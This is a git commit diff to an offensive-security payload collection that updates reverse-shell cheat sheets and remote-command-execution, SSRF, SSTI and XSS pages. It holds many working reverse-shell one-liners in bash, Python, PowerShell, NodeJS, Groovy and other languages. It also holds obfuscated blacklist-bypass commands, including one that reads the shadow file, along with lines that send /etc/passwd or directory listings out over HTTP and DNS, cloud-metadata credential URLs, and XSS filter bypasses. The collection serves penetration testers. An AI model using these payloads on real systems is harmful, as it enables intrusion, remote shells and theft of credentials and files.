Multiple update in READMEs + RCE tricks

This commit is contained in:
Swissky 2018-08-12 00:17:58 +02:00
parent b20cdde4d9
commit 177c12cb79
16 changed files with 153 additions and 98 deletions

View File

@ -2,14 +2,14 @@
## Reverse Shell Cheat Sheet
Bash TCP
### Bash TCP
```bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196
```
Bash UDP
### Bash UDP
```
Victim:
sh -i >& /dev/udp/127.0.0.1/4242 0>&1
@ -19,7 +19,7 @@ nc -u -lvp 4242
```
Perl
### Perl
```perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
@ -30,17 +30,17 @@ NOTE: Windows only
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
```
Python
### Python
```python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
PHP
### PHP
```bash
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
```
Ruby
### Ruby
```ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
@ -51,23 +51,23 @@ ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.pope
```
Netcat Traditional
### Netcat Traditional
```bash
nc -e /bin/sh [IPADDR] [PORT]
```
Netcat OpenBsd
### Netcat OpenBsd
```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
```
Ncat
### Ncat
```bash
ncat 127.0.0.1 4444 -e /bin/bash
ncat --udp 127.0.0.1 4444 -e /bin/bash
```
Powershell
### Powershell
```powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
@ -81,14 +81,14 @@ powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40
powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
```
Java
### Java
```java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```
NodeJS
### NodeJS
```javascript
(function(){
var net = require("net"),
@ -102,8 +102,28 @@ NodeJS
});
return /a/; // Prevents the Node.js application form crashing
})();
or
require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
or
-var x = global.process.mainModule.require
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
```
### Groovy - by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)
```javascript
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```
NOTE: Java reverse shell also work for Groovy
## Spawn TTY
```
/bin/sh -i

132
README.md
View File

@ -29,46 +29,72 @@ You might also like :
* Tomcat CVE-2017-12617.py
## Tools
* [Kali Linux](https://www.kali.org/)
* [Web Developer](https://addons.mozilla.org/en-Gb/firefox/addon/web-developer/)
* [Hackbar](https://addons.mozilla.org/en-Gb/firefox/addon/hackbar/?src=search) - Not compatible with Firefox Quantum
* [Burp Proxy](https://portswigger.net)
* [Fiddler](https://www.telerik.com/download/fiddler)
* [DirBuster](https://sourceforge.net/projects/dirbuster/)
* [GoBuster](https://github.com/OJ/gobuster)
* [Knockpy](https://github.com/guelfoweb/knock)
* [SQLmap](http://sqlmap.org)
* [Nikto](https://cirt.net/nikto2)
* [Nessus](http://www.tenable.com/products/nessus-vulnerability-scanner)
* [Recon-ng](https://bitbucket.org/LaNMaSteR53/recon-ng)
* [Wappalyzer](https://wappalyzer.com/download)
* [Metasploit](https://www.metasploit.com/)
* [OpenVAS](http://www.openvas.org/)
## Try Harder
Ever wonder where you can use your knowledge ? The following list will help you find "targets" to improve your skills.
* __Bug Bounty Platforms__
* [HackerOne](https://hackerone.com)
* [BugCrowd](https://bugcrowd.com)
* [Bounty Factory](https://bountyfactory.io)
* [Synack](https://www.synack.com/)
* [Intigriti](https://www.intigriti.com)
* [List of Bounty Program](https://bugcrowd.com/list-of-bug-bounty-programs/)
* __Online Platforms__
* [Hack The Box](hackthebox.eu/)
* [Penetration test lab "Test lab" | Pentestit](https://lab.pentestit.ru)
* [PentesterLab : Learn Web Penetration Testing: The Right Way](https://pentesterlab.com/)
* [Zenk-Security](https://www.zenk-security.com/epreuves.php)
* [Root-Me](https://www.root-me.org)
* [W3Challs](https://w3challs.com/)
* [NewbieContest](https://www.newbiecontest.org/)
* [Vulnhub](https://www.vulnhub.com/)
* [The Cryptopals Crypto Challenges](https://cryptopals.com/)
* [alert(1) to win](https://alf.nu/alert1)
* [Hacksplaining](https://www.hacksplaining.com/exercises)
* [HackThisSite](https://hackthissite.org)
* [Hackers.gg](hackers.gg)
* [Mind Map - Penetration Testing Practice Labs - Aman Hardikar](http://www.amanhardikar.com/mindmaps/Practice.html)
## Book's list
Grab a book and relax, these ones are the best security books (in my opinion).
* [Web Hacking 101](https://leanpub.com/web-hacking-101)
* [Breaking into Information Security: Learning the Ropes 101 - Andrew Gill](https://leanpub.com/ltr101-breaking-into-infosec)
* [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
* [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
* [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
* [The Hacker Playbook 3: Practical Guide to Penetration Testing - Red Team Edition](http://a.co/6MqC9bD)
* [The Mobile Application Hackers Handbook](http://amzn.to/2cVOIrE)
* [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
* [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
* [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
* [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
* [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
* [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
* [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
* [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
* [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
* [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
* [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)
## Online Challenges
* [Hack The Box](hackthebox.eu/)
* [Root-Me](https://www.root-me.org)
* [Zenk-Security](https://www.zenk-security.com/epreuves.php)
* [W3Challs](https://w3challs.com/)
* [NewbieContest](https://www.newbiecontest.org/)
* [Vulnhub](https://www.vulnhub.com/)
* [The Cryptopals Crypto Challenges](https://cryptopals.com/)
* [Penetration Testing Practice Labs](http://www.amanhardikar.com/mindmaps/Practice.html)
* [alert(1) to win](https://alf.nu/alert1)
* [Hacksplaining](https://www.hacksplaining.com/exercises)
* [HackThisSite](https://hackthissite.org)
* [PentesterLab : Learn Web Penetration Testing: The Right Way](https://pentesterlab.com/)
* [Hackers.gg](hackers.gg)
## More resources
## Bug Bounty
* [HackerOne](https://hackerone.com)
* [BugCrowd](https://bugcrowd.com)
* [Bounty Factory](https://bountyfactory.io)
* [List of Bounty Program](https://bugcrowd.com/list-of-bug-bounty-programs/)
### Blogs/Websites
* [BUG BOUNTY FIELD MANUAL: THE DEFINITIVE GUIDE FOR PLANNING, LAUNCHING, AND OPERATING A SUCCESSFUL BUG BOUNTY PROGRAM](https://www.hackerone.com/blog/the-bug-bounty-field-manual)
* [How to become a Bug Bounty Hunter - Sam Houston](https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102)
* [Tips from Top Hackers Bug Hunting methodology and the importance of writing quality submissions - Sam Houston](https://www.bugcrowd.com/tips-from-top-hackers-bug-hunting-methodology-and-the-importance-of-writing-quality-submissions/)
* [ARNE SWINNEN'S SECURITY BLOG JUST ANOTHER INFOSEC BLOG](https://www.arneswinnen.net)
* [XSS Jigsaw - innerht.ml](https://blog.innerht.ml)
* [ZeroSec Blog: Featuring Write-Ups, Projects & Adventures](https://blog.zsec.uk/tag/ltr101/)
## Docker
### Youtube
* [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)
* [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc)
* [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8)
* [IppSec Channel - Hack The Box Writeups](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)
### Docker
| Command | Link |
| :------------- | :------------- |
| `docker pull remnux/metasploit` | [docker-metasploit](https://hub.docker.com/r/remnux/metasploit/) |
@ -83,37 +109,3 @@ You might also like :
| `docker-compose build && docker-compose up` | [OWASP NodeGoat](https://github.com/owasp/nodegoat#option-3---run-nodegoat-on-docker) |
| `docker pull citizenstig/nowasp` | [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/) |
| `docker pull bkimminich/juice-shop` | [OWASP Juice Shop](https://github.com/bkimminich/juice-shop#docker-container) |
## More resources
### Book's list:
* [Web Hacking 101](https://leanpub.com/web-hacking-101)
* [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
* [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
* [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
* [The Mobile Application Hackers Handbook](http://amzn.to/2cVOIrE)
* [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
* [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
* [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
* [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
* [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
* [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
* [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
* [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
* [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
* [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
* [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)
### Blogs/Websites
* http://blog.zsec.uk/101-web-testing-tooling/
* https://blog.innerht.ml
* https://blog.zsec.uk
* https://www.exploit-db.com/google-hacking-database
* https://www.arneswinnen.net
* https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102
### Youtube
* [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)
* [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc)
* [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8)
* [IppSec Channel - Hack The Box Writeups](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)

View File

@ -1,5 +1,6 @@
# Remote Commands Execution
Remote Commands execution is a security vulnerability that allows an attacker to execute Commandss from a remote server.
NOTE: Reverse Shell Command are relocated to a [single file](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
## Exploits
@ -87,6 +88,13 @@ Bypass blacklisted word with $@
who$@ami
```
Bypass blacklisted word with variable expansion
```powershell
test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}
```
Bypass zsh/bash/sh blacklist
```powershell
echo $0
@ -94,6 +102,12 @@ echo $0
echo whoami|$0
```
## Challenge
Challenge based on the previous tricks, what does the following command do:
```powershell
g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/}
```
## Time based data exfiltration
Extracting data : char by char
@ -118,13 +132,9 @@ Based on the tool from https://github.com/HoLyVieR/dnsbin also hosted at dnsbin.
for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
```
## Environment based
NodeJS Commands execution
```powershell
require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST')
```
## Thanks to
* [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
* [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136)
* [No PHP, no spaces, no $, no { }, bash only - @asdizzle](https://twitter.com/asdizzle_/status/895244943526170628)
* [#bash #obfuscation by string manipulation - Malwrologist, @DissectMalware](https://twitter.com/DissectMalware/status/1025604382644232192)

View File

@ -1,6 +1,23 @@
# Server-Side Request Forgery
Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on behalf of him.
## Summary
* [Exploit with localhost]()
* [Bypassing filters]()
* [SSRF via URL Scheme]()
* [SSRF to XSS]()
* [SSRF URL for Cloud Instances]()
* [SSRF URL for AWS Bucket]()
* [SSRF URL for Google Cloud]()
* [SSRF URL for Digital Ocean]()
* [SSRF URL for Packetcloud]()
* [SSRF URL for Azure]()
* [SSRF URL for OpenStack/RackSpace]()
* [SSRF URL for HP Helion]()
* [SSRF URL for Oracle Cloud]()
* [SSRF URL for Alibaba]()
## Exploit with localhost
Basic SSRF v1
@ -203,8 +220,9 @@ https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brut
```
## SSRF on AWS Bucket - [Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
## SSRF URL for Cloud Instances
### SSRF URL for AWS Bucket
[Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
Interesting path to look for at http://169.254.169.254
```
Always here : /latest/meta-data/{hostname,public-ipv4,...}
@ -253,7 +271,7 @@ http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
```
## SSRF URL for Google Cloud
### SSRF URL for Google Cloud
Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True"
```
http://169.254.169.254/computeMetadata/v1/
@ -275,7 +293,7 @@ http://metadata.google.internal/computeMetadata/v1beta1/
```
## SSRF URL for Digital Ocean
### SSRF URL for Digital Ocean
https://developers.digitalocean.com/documentation/metadata/
```powershell
curl http://169.254.169.254/metadata/v1/id
@ -291,12 +309,12 @@ All in one request:
curl http://169.254.169.254/metadata/v1.json | jq
```
## SSRF URL for Packetcloud
### SSRF URL for Packetcloud
```
https://metadata.packet.net/userdata
```
## SSRF URL for Azure
### SSRF URL for Azure
Limited, maybe more exist? https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/
```
http://169.254.169.254/metadata/v1/maintenance
@ -308,19 +326,19 @@ http://169.254.169.254/metadata/instance?api-version=2017-04-02
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
```
## SSRF URL for OpenStack/RackSpace
### SSRF URL for OpenStack/RackSpace
(header required? unknown)
```
http://169.254.169.254/openstack
```
## SSRF URL for HP Helion
### SSRF URL for HP Helion
(header required? unknown)
```
http://169.254.169.254/2009-04-04/meta-data/
```
## SSRF URL for Oracle Cloud
### SSRF URL for Oracle Cloud
```
http://192.0.0.192/latest/
http://192.0.0.192/latest/user-data/
@ -328,7 +346,7 @@ http://192.0.0.192/latest/meta-data/
http://192.0.0.192/latest/attributes/
```
## SSRF URL for Alibaba
### SSRF URL for Alibaba
```
http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/instance-id

View File

@ -5,10 +5,11 @@
Recommended tool: [Tplmap](https://github.com/epinna/tplmap)
e.g:
```
./tplmap.py --os-shell -u 'http://www.target.com/page?name=John'
python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
```
## Ruby
### Basic injection
```python
@ -22,7 +23,7 @@ e.g:
## Java
### Basic injection
### Basic injection
```java
${7*7}
${{7*7}}
@ -174,6 +175,13 @@ Inject this template
{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
```
## AngularJS
### Basic injection
```javascript
$eval('1+1')
{{1+1}}
```
## Thanks to
* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
* [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)

View File

@ -18,8 +18,9 @@
5. The content of the cache is displayed
```
[![IMAGE ALT TEXT HERE](https://img.youtube.com/vi/pLte7SomUB8/0.jpg)](https://www.youtube.com/watch?v=pLte7SomUB8)
[![YOUTUBE DEMO](https://img.youtube.com/vi/pLte7SomUB8/0.jpg)](https://www.youtube.com/watch?v=pLte7SomUB8)
Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
## Thanks to
* http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html
* [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html)
* [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning)

View File

@ -644,6 +644,12 @@ Exotic payloads
## Common WAF Bypass
### Chrome Auditor - 9th august
```javascript
</script><svg><script>alert(1)-%26apos%3B
```
Live example by @brutelogic - [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c1=</script><svg><script>alert(1)-%26apos%3B)
### Incapsula WAF Bypass - 8th march
```javascript
anythinglr00</script><script>alert(document.domain)</script>uxldz
@ -663,10 +669,10 @@ Use notification box instead of an alert - by [@brutelogic](https://twitter.com/
Note : it requires user permission
```
Notification.requestPermission(x=>{new(Notification)(1)})
Try here : https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermission(x=>%7Bnew(Notification)(1)%7D)//
```
Try here : [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermission(x=>%7Bnew(Notification)(1)%7D)//)
## Thanks to
* https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot